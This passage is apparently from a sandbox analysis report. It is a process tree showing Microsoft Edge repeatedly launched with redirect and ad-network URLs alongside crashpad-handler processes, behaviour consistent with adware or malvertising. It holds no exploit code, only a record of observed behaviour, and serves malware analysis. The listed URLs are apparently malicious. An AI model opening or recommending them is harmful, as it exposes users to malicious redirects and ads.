"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:1104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
13⤵
PID:4288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:3312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
13⤵
PID:3848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:8852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
13⤵
PID:8352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:7600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
13⤵
PID:10140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:3500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
13⤵
PID:1588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:5340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
13⤵
PID:5056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:6880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
13⤵
PID:12664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe8,0xdc,0x108,0xe4,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:12496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
13⤵
PID:7392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:13844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
13⤵
PID:14224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0xdc,0x108,0x100,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:13808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=3
13⤵
PID:13812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:15048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1339680
13⤵
PID:15532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:15344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=3
13⤵
PID:16544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:16532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1343178
13⤵
PID:17192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:17292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
13⤵
PID:18568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:18384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
13⤵
PID:19764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:19816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
13⤵
PID:21256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xdc,0x114,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:15652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
13⤵
PID:21028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:21200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
13⤵
PID:22480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:22628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
13⤵
PID:18844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:22928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
13⤵
PID:23496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0xdc,0x108,0x100,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:23240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
13⤵
PID:24660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:24644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
13⤵
PID:24568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0xdc,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:24056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
13⤵
PID:15508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:26160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=3
13⤵
PID:25616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:26092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1339680
13⤵
PID:26964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xa8,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:27560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=3
13⤵
PID:25304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:25316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1343178
13⤵
PID:29144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
